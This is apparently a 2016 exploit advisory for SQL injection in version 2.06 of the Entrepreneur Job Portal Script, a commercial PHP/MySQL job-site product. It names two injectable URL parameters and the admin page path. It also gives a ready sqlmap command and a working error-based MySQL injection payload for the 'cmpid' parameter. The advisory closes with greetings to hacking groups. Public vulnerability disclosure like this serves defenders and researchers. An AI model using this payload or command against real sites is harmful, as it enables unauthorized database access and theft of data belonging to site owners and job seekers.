| Title: Entrepreneur Job Portal Script SQL Injection
| Software : Entrepreneur Job Portal Script
| Version : 2.06
| Vendor : http://www.i-netsolution.com/
| Date : 07 October 2016
| Author : OoN_Boy
| Technology : PHP
| Database : MySQL
| Price: $353 - $1399
| Description: Jobsite Script is an advanced PHP job site script to start Job site like all popular . It is a complete script with advanced features.
| Proof of concept SQL 1 : http://localhost/job-portal/jobsearch_all.html?sch=%Inject_Here%21
| Proof of concept SQL 2 : http://localhost/job-portal/jobsearch_all.html?cmpid=%Inject_Here%21
| Admin Page : http://localhost/[path]/admin/index.php
| Exploit With Sqlmap
sqlmap -u 'http://localhost/job-portal/jobsearch_all.html?cmpid=31453525536'
Parameter: cmpid (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cmpid=31453525536' AND (SELECT 8347 FROM(SELECT COUNT(*),CONCAT(0x716a7a7a71,(SELECT (ELT(8347=8347,1))),0x7178716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'tqjF'='tqjF
| Greetz : antisecurity.org batamhacker.or.id
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| Hi All long time no see ^_^